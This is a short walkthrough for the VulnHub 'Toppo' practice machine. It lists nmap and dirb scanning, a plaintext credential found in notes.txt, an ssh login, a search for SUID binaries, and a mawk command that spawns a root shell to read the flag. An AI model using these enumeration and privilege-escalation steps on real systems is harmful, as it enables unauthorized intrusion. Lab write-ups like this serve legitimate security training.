VulnHub

VulnHub Walkthrough: 🔝 Toppo

Running nmap -p0-65535 <ipaddr> tells us ssh & http are open.

1. Run a dirb scan while you’re looking through the source code of the website (http://[IP Address]): dirb http://<ipaddr>

2. Dirb returns http://[IP Address]/admin. Taking a deeper look at the source code of this page, we find notes.txt containing:
   • username: ted & password: 12345ted123

3. From there we can use the secure shell host protocol, 22, to login - ssh ted@<ipaddr> , enter “yes” & password.

4. Once you’re in, use pwd to “print working directory”, & whoami to output the user you are logged in as.

5. Next find a list of all programs the logged in user has permissions to:
   • find / -perm -u=s -type f 2>/dev/null
6. Within the output we see that mawk is available, which we will then use to spawn in sh shell (see GTFOBins):
   • mawk 'BEGIN {system("/bin/sh")}'
7. Once it has spawned, find & print the flag:
   • cd root; cat flag.txt

This site is open source. Improve this page.